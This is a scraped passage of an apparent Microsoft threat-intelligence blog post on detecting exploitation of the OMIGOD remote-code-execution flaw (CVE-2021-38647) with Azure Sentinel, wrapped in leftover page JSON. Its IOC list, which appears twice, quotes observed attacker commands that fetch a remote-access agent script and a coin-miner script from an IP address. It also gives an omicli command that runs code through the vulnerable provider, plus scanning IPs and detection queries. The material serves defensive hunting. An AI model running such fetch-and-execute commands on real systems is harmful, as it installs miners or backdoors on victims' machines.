IOCs\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\n\\n\r\nCommon enumeration\r\ncommands seen\r\n\\n\r\n\\n\r\nuname -a, id, netstat, ps\r\n\\n\r\n\\n\r\nExploitation attempt\r\n\\n\r\n\\n\r\nwget hxxps://www.dwservice.net/download/dwagent_generic.sh  -O\r\ndwagent_generic.sh\r\n\\n\r\n\\n\r\nExploitation attempt\r\n\\n\r\n\\n\r\necho curl hxxps://www.dwservice.net/download/dwagent_generic.sh  --output dw.sh\r\n\u003e go.sh\r\n\\n\r\n\\n\r\nExploitation attempt\r\n\\n\r\ncurl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 12 of 38\n\n\\n \\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n13.212.235.12\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n142.93.148.12\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n171.224.80.216\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n185.220.100.245\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n216.151.191.152\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n23.129.64.140\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n31.44.185.115\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n46.30.42.126\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n5.45.127.209\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n94.198.42.158\r\n\\n\r\n\\n\\n\r\nReferences: \r\n\\n\r\nMSRC communications:\r\n\\n\r\n\\n\r\nCVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution\r\nVulnerability\r\n\\n\r\nAdditional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security\r\nResponse Center\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 13 of 38\n\n\\n\r\n\\n\r\nAzure Security Center Guidance:\r\n\\n\r\n\\n\r\nUsing ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech\r\nCommunity\r\n\\n\r\n\\n\r\nSentinel Detections:\r\n\\n\r\n\\n\r\nAzure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub\r\n\\n\r\nAzure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub\r\n\\n\r\nAzure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24,\r\n2021]\r\n\\n\r\n\\n\r\nSoftware and tools:\r\n\\n\r\n\\n\r\nGitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager\r\n\\n\r\nGitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)\r\n\\n\r\n\\n\\n\r\n\\n\r\nAzure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go\r\n(github.com)\r\n\\n\r\n\\n\\n\r\nPublic Discussion About Attacks in the wild:\r\n\\n\r\n\\n\r\nchris doman on Twitter: \\\":loudspeaker:OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:\r\nWe took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI\r\nis installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\\\" / Twitter\r\n\\n\r\nAndrew Morris on Twitter: \\\"The Azure \\\"OHMIGOD\\\" vulnerability (CVE-2021-38647) is increasing a good bit.\r\n~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN\r\nusers and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\\\" / Twitter\r\n\\n\r\nKevin Beaumont on Twitter: \\\"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given\r\nMirai can enter networks and spread laterally via multiple vulns, this might be problematic.\r\nhttps://t.co/8nXSEcMHYa\\\" / Twitter\r\n\\n\r\n\\n\",\"body@stringLength\":\"24902\",\"rawBody\":\"\r\nRussell McDonald, Roberto Rodriguez, and Ajeet Prakash\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 14 of 38\n\n\\n\r\nSpecial thanks to: Ross Bevington \r\n\\n\\n\r\nFollowing the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)\r\nin the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)\r\nhave been monitoring for signs of exploitation and investigating detections to further protect customers. Following the\r\nMSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this\r\nblog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders\r\nto look for on host machines, and to share new detections in Azure Sentinel.\r\n\\n\\n\r\nAttacks in the wild\r\n\\n\r\nAt Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,\r\nand to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation\r\nof the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic\r\nhost enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details\r\navailable below in Hunting cues section). We have also seen others in the community report similar behavior to include\r\ninstalls of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. \r\nDue to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we\r\nare anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).\r\n\\n\\n\r\nWhat is OMI?\r\n\\n\r\nOMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is\r\nalso designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a\r\nmuch more viable CIM Object Manager for embedded systems and other infrastructure components that have memory\r\nconstraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most\r\nUNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.\r\n\\n\\n\r\nUnauthenticated remote command execution?\r\n\\n\r\nIn a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can\r\nexecute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401\r\nunauthorized response. However, the user is able to execute commands with root privileges.\r\n\\n\r\nMore details are available in the MSRC CVE-2021-38647 post and the finder company Wiz blog post.\r\n\\n\\n\r\nEndpoint Execution Context\r\n\\n\r\nIn addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to\r\nexplore at the endpoint level.\r\n\\n\\n\r\nSCXCore Providers\r\n\\n\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 15 of 38\n\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\r\nMicrosoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.\r\n\\n\r\nThe SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux\r\nsystem. There are several providers or classes available through the SCXcore provider which can be used to gather\r\ninformation from an endpoint such as  MemoryStatisticalInformation or FileSystemStatisticalInformation.\r\n\\n\\n\r\nIn addition, there is one support provider named the RunAsProvider which provides the following classes:\r\n\\n\r\n\\n\r\nExecuteCommand: Executes any UNIX/Linux native command\r\n\\n\r\nExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell\r\n\\n\r\nExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell\r\n\\n\r\n\\n\\n\r\nExecuting Code via ExecuteShellCommand\r\n\\n\r\nBased on the initial research from Wiz, the following command was used to explore network traffic in order to craft an\r\nHTTP request to test the vulnerability:\r\n\\n\\n\\n\\n\\n\\n\\n\r\n/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem }\r\nExecuteShellCommand { command 'id' timeout 0 }\r\n\\n\\n\r\nDuring testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify\r\nadditional sources of data. The following command was used:\r\n\\n\\n\\n\\n\\n\\n\\n\r\n/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose\r\n\\n\\n\r\nAfter running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the\r\nRunAsProvider :: Invoke_ExecuteShellCommand class:\r\n\\n\r\nChecking logs from auditd via Syslog, we also identified where the code was being executed from:\r\n\\n\\n\r\nWe tested the same in our lab environments, and we observed the same behavior which is shown below:\r\n\\n\\n\\n\r\nLooking at the code behind the components of the RunAs providers, there are some references to it:\r\n\\n\\n\\n\r\nMore information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider\r\nfor Operations Manager\r\n\\n\\n\r\nExecuting Code via ExecuteScript\r\n\\n\\n\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 16 of 38\n\nSimilarly, scripts can be run using the ExecuteScript provider. In this case, the body of the http request contains a reference\r\nto ExecuteScript.  In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:\r\n\\n\\n\\n\r\nIn this case, the script is passed into a temp directory which you can see in the execve logs. Look for a commandline similar\r\nto /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same\r\n/var/opt/microsoft/scx/tmp current working directory.\r\n\\n\r\nOf note, this is the method we have seen used with attackers attempting to install coin miners.\r\n\\n\\n\r\nAzure Sentinel coverage\r\n\\n\r\nRelevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel\r\nhas made it easy to collect the data from multiple data sources easily. This section of the post contains guidance and generic\r\napproaches to look for the OMI related activity in various data feeds that are available by default in Azure Sentinel or can be\r\nonboarded to Azure Sentinel.\r\n\\n\\n\r\nSome Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.\r\nAttackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via\r\nHTTPS to port listening to OMI to gain initial access to the machine.\r\n\\n\\n\r\nThe Azure Sentinel query linked below tries to identify connection attempts from the external IP addresses to the OMI\r\nmanagement ports (5985,5986,1270). The query primarily leverages the Network Session normalization schema\r\n(imNetworkSession)  as well as a few other logs to look for this network connection activity from an external IP address.\r\nWhere available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the\r\nquery has been shipped as a hunting query.\r\n\\n\r\nNormalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be\r\ndeployed in a click using an ARM Template.\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nCustomers can also use Heartbeat logs that monitors agent health to find vulnerable machine. The Azure Sentinel query\r\nlinked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are\r\nnot updated to the latest version that prevents this vulnerability.\r\n\\n\r\n[updated Sept 27, 2021]\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nAdditionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an\r\nAzure Environment with OMI installed. With the continuous export feature of Security Center, these security\r\nrecommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data populated in Security Nested\r\nRecommendations table to build a detection query to show vulnerable machines.\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nAzure Service Health has also sent notifications to potentially impacted customers. In the impacted environments where\r\ncustomers can run a quick query to check if they are impacted by this Vulnerability.\r\n\\n\\n\\n\\n\\n\\n\\n\r\n\\n\r\nAzureActivity\r\n| where CategoryValue == 'ServiceHealth'\r\n| where isnotempty(Properties) and Properties has 'CVE-2021-38645'\r\n| extend defaultLanguageTitle =\r\ntostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 17 of 38\n\n\\n\r\n\\n\\n\r\nSCX RunAs Provider\r\n\\n\r\n[updated Sept 24, 2021]\r\n\\n\r\nThe below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure\r\nSentinel Syslog data connector to explore the use of SCX Execute RunAs providers.\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nExecute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux\r\ncommand and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and\r\ndepending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider\r\nis used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx\r\n(e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of\r\nproducts including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.\r\n\\n\\n\r\nHunting cues and IOCs\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\n\\n\r\nCommon enumeration\r\ncommands seen\r\n\\n\r\n\\n\r\nuname -a, id, netstat, ps\r\n\\n\r\n\\n\r\nExploitation attempt\r\n\\n\r\n\\n\r\nwget hxxps://www.dwservice.net/download/dwagent_generic.sh  -O\r\ndwagent_generic.sh\r\n\\n\r\n\\n\r\nExploitation attempt\r\n\\n\r\n\\n\r\necho curl hxxps://www.dwservice.net/download/dwagent_generic.sh  --output dw.sh\r\n\u003e go.sh\r\n\\n\r\n\\n\r\nExploitation attempt\r\n\\n\r\n\\n\r\ncurl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n13.212.235.12\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n142.93.148.12\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n171.224.80.216\r\n\\n\r\n\\n \\n\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 18 of 38\n\nScanning IPs\r\n\\n\r\n185.220.100.245\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n216.151.191.152\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n23.129.64.140\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n31.44.185.115\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n46.30.42.126\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n5.45.127.209\r\n\\n\r\n\\n\r\nScanning IPs\r\n\\n\r\n\\n\r\n94.198.42.158\r\n\\n\r\n\\n\\n\r\nReferences: \r\n\\n\r\nMSRC communications:\r\n\\n\r\n\\n\r\nCVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution\r\nVulnerability\r\n\\n\r\nAdditional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security\r\nResponse Center\r\n\\n\r\n\\n\r\nAzure Security Center Guidance:\r\n\\n\r\n\\n\r\nUsing ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech\r\nCommunity\r\n\\n\r\n\\n\r\nSentinel Detections:\r\n\\n\r\n\\n\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 19 of 38\n\nAzure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub\r\n\\n\r\nAzure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub\r\n\\n\r\nAzure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24,\r\n2021]\r\n\\n\r\n\\n\r\nSoftware and tools:\r\n\\n\r\n\\n\r\nGitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager\r\n\\n\r\nGitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)\r\n\\n\r\n\\n\r\nResearch lab environments:\r\n\\n\r\n\\n\r\nAzure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go\r\n(github.com)\r\n\\n\r\n\\n\\n\r\nPublic Discussion About Attacks in the wild:\r\n\\n\r\n\\n\r\nchris doman on Twitter: \\\"OMIGOD (CVE-2021-38647) is now under active exploitation We took at a look at one of\r\nthe first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI is installed\r\nhttps://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\\\" / Twitter\r\n\\n\r\nAndrew Morris on Twitter: \\\"The Azure \\\"OHMIGOD\\\" vulnerability (CVE-2021-38647) is increasing a good bit.\r\n~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN\r\nusers and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\\\" / Twitter\r\n\\n\r\nKevin Beaumont on Twitter: \\\"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given\r\nMirai can enter networks and spread laterally via multiple vulns, this might be problematic.\r\nhttps://t.co/8nXSEcMHYa\\\" / Twitter\r\n\\n\r\n\\n\",\"kudosSumWeight\":5,\"postTime\":\"2021-09-18T15:57:42.783-07:00\",\"images\":\r\n{\"__typename\":\"AssociatedImageConnection\",\"edges\":\r\n[{\"__typename\":\"AssociatedImageEdge\",\"cursor\":\"MjYuMXwyLjF8b3wyNXxfTlZffDE\",\"node\":\r\n{\"__ref\":\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNWk5QzZDODY2OTQ2NjRBNjA0?\r\nrevision=25\\\"}\"}},{\"__typename\":\"AssociatedImageEdge\",\"cursor\":\"MjYuMXwyLjF8b3wyNXxfTlZffDI\",\"node\":\r\n{\"__ref\":\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOGk0MDFFNjFGQ0YxODU5RkRE?\r\nrevision=25\\\"}\"}},{\"__typename\":\"AssociatedImageEdge\",\"cursor\":\"MjYuMXwyLjF8b3wyNXxfTlZffDM\",\"node\":\r\n{\"__ref\":\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyN2kyMDBFREUxMEZGNTJEM0U5?\r\nrevision=25\\\"}\"}},{\"__typename\":\"AssociatedImageEdge\",\"cursor\":\"MjYuMXwyLjF8b3wyNXxfTlZffDQ\",\"node\":\r\n{\"__ref\":\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNmk1RUZENDg3OTNCMDg5M0ZG?\r\nrevision=25\\\"}\"}},{\"__typename\":\"AssociatedImageEdge\",\"cursor\":\"MjYuMXwyLjF8b3wyNXxfTlZffDU\",\"node\":\r\n{\"__ref\":\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOWlFRTdDQUE5RkVBNjUwQkE5?\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 20 of 38\n\nrevision=25\\\"}\"}},{\"__typename\":\"AssociatedImageEdge\",\"cursor\":\"MjYuMXwyLjF8b3wyNXxfTlZffDY\",\"node\":\r\n{\"__ref\":\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMzMGk1OUIxM0JCOUZFMTZGQkQw?\r\nrevision=25\\\"}\"}}],\"totalCount\":6,\"pageInfo\":\r\n{\"__typename\":\"PageInfo\",\"hasNextPage\":false,\"endCursor\":null,\"hasPreviousPage\":false,\"startCursor\":null}},\"attachments\":\r\n{\"__typename\":\"AttachmentConnection\",\"pageInfo\":\r\n{\"__typename\":\"PageInfo\",\"hasNextPage\":false,\"endCursor\":null,\"hasPreviousPage\":false,\"startCursor\":null},\"edges\":\r\n[]},\"tags\":{\"__typename\":\"TagConnection\",\"pageInfo\":\r\n{\"__typename\":\"PageInfo\",\"hasNextPage\":false,\"endCursor\":null,\"hasPreviousPage\":false,\"startCursor\":null},\"edges\":\r\n[{\"__typename\":\"TagEdge\",\"cursor\":\"MjYuMXwyLjF8b3wxMHxfTlZffDE\",\"node\":\r\n{\"__typename\":\"Tag\",\"id\":\"tag:hunting\",\"text\":\"hunting\",\"time\":\"2019-04-11T09:00:00.012-\r\n07:00\",\"lastActivityTime\":null,\"messagesCount\":null,\"followersCount\":null}},\r\n{\"__typename\":\"TagEdge\",\"cursor\":\"MjYuMXwyLjF8b3wxMHxfTlZffDI\",\"node\":\r\n{\"__typename\":\"Tag\",\"id\":\"tag:microsoft sentinel\",\"text\":\"microsoft sentinel\",\"time\":\"2021-11-02T10:33:48.383-\r\n07:00\",\"lastActivityTime\":null,\"messagesCount\":null,\"followersCount\":null}}]},\"timeToRead\":8,\"rawTeaser\":\"\\n\\n\r\nMicrosoft Threat Intelligence Center (MSTIC) have been monitoring for signs of exploitation of the OMI vulnerability and\r\ninvestigating detections to further protect customers.\r\n\",\"introduction\":\"\",\"coverImage\":null,\"coverImageProperties\":\r\n{\"__typename\":\"CoverImageProperties\",\"style\":\"STANDARD\",\"titlePosition\":\"BOTTOM\",\"altText\":\"\"},\"currentRevision\":\r\n{\"__ref\":\"Revision:revision:2764093_25\"},\"latestVersion\":\r\n{\"__typename\":\"FriendlyVersion\",\"major\":\"11\",\"minor\":\"0\"},\"metrics\":\r\n{\"__typename\":\"MessageMetrics\",\"views\":254181},\"read\":false,\"visibilityScope\":\"PUBLIC\",\"canonicalUrl\":null,\"seoTitle\":null,\"seoDescription\":null,\"p\r\n{\"__typename\":\"UserConnection\",\"edges\":[]},\"nonCoAuthorContributors\":{\"__typename\":\"UserConnection\",\"edges\":\r\n[]},\"coAuthors\":{\"__typename\":\"UserConnection\",\"edges\":[]},\"blogMessagePolicies\":\r\n{\"__typename\":\"BlogMessagePolicies\",\"canDoAuthoringActionsOnBlog\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.blog.action_can_do_authoring_action.accessDenied\",\"key\":\"error.lithium.policies.blog\r\n[]}}},\"archivalData\":null,\"customFields\":[],\"revisions({\\\"constraints\\\":{\\\"isPublished\\\":{\\\"eq\\\":true}}})\":\r\n{\"__typename\":\"RevisionConnection\",\"totalCount\":25}},\"Conversation:conversation:2764093\":\r\n{\"__typename\":\"Conversation\",\"id\":\"conversation:2764093\",\"solved\":false,\"topic\":\r\n{\"__ref\":\"BlogTopicMessage:message:2764093\"},\"lastPostingActivityTime\":\"2021-11-03T04:04:57.678-\r\n07:00\",\"lastPostTime\":\"2021-09-26T23:20:10.247-\r\n07:00\",\"unreadReplyCount\":3,\"isSubscribed\":false},\"ModerationData:moderation_data:2764093\":\r\n{\"__typename\":\"ModerationData\",\"id\":\"moderation_data:2764093\",\"status\":\"APPROVED\",\"rejectReason\":null,\"isReportedAbuse\":false,\"rejectUser\":nu\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNWk5QzZDODY2OTQ2NjRBNjA0?\r\nrevision=25\\\"}\":\r\n{\"__typename\":\"AssociatedImage\",\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNWk5QzZDODY\r\nrevision=25\",\"title\":\"nmap.png\",\"associationType\":\"TEASER\",\"width\":530,\"height\":193,\"altText\":null},\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOGk0MDFFNjFGQ0YxODU5RkRE?\r\nrevision=25\\\"}\":\r\n{\"__typename\":\"AssociatedImage\",\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOGk0MDFFNjFG\r\nrevision=25\",\"title\":\"russmc_0-\r\n1632000577051.png\",\"associationType\":\"BODY\",\"width\":2540,\"height\":1067,\"altText\":null},\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyN2kyMDBFREUxMEZGNTJEM0U5?\r\nrevision=25\\\"}\":\r\n{\"__typename\":\"AssociatedImage\",\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyN2kyMDBFREU\r\nrevision=25\",\"title\":\"russmc_1-\r\n1632000577059.png\",\"associationType\":\"BODY\",\"width\":1496,\"height\":214,\"altText\":null},\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNmk1RUZENDg3OTNCMDg5M0ZG?\r\nrevision=25\\\"}\":\r\n{\"__typename\":\"AssociatedImage\",\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNmk1RUZENDg\r\nrevision=25\",\"title\":\"russmc_2-\r\n1632000577065.png\",\"associationType\":\"BODY\",\"width\":679,\"height\":278,\"altText\":null},\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOWlFRTdDQUE5RkVBNjUwQkE5?\r\nrevision=25\\\"}\":\r\n{\"__typename\":\"AssociatedImage\",\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOWlFRTdDQUE\r\nrevision=25\",\"title\":\"russmc_3-\r\n1632000577069.png\",\"associationType\":\"BODY\",\"width\":1205,\"height\":316,\"altText\":null},\"AssociatedImage:\r\n{\\\"url\\\":\\\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMzMGk1OUIxM0JCOUZFMTZGQkQw?\r\nrevision=25\\\"}\":\r\n{\"__typename\":\"AssociatedImage\",\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMzMGk1OUIxM0JC\r\nrevision=25\",\"title\":\"russmc_4-\r\n1632000577071.png\",\"associationType\":\"BODY\",\"width\":508,\"height\":141,\"altText\":null},\"Revision:revision:2764093_25\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 21 of 38\n\n{\"__typename\":\"Revision\",\"id\":\"revision:2764093_25\",\"lastEditTime\":\"2021-11-03T04:04:57.678-\r\n07:00\"},\"CachedAsset:theme:customTheme1-1774591513337\":{\"__typename\":\"CachedAsset\",\"id\":\"theme:customTheme1-\r\n1774591513337\",\"value\":{\"id\":\"customTheme1\",\"animation\":\r\n{\"fast\":\"150ms\",\"normal\":\"250ms\",\"slow\":\"500ms\",\"slowest\":\"750ms\",\"function\":\"cubic-bezier(0.07, 0.91, 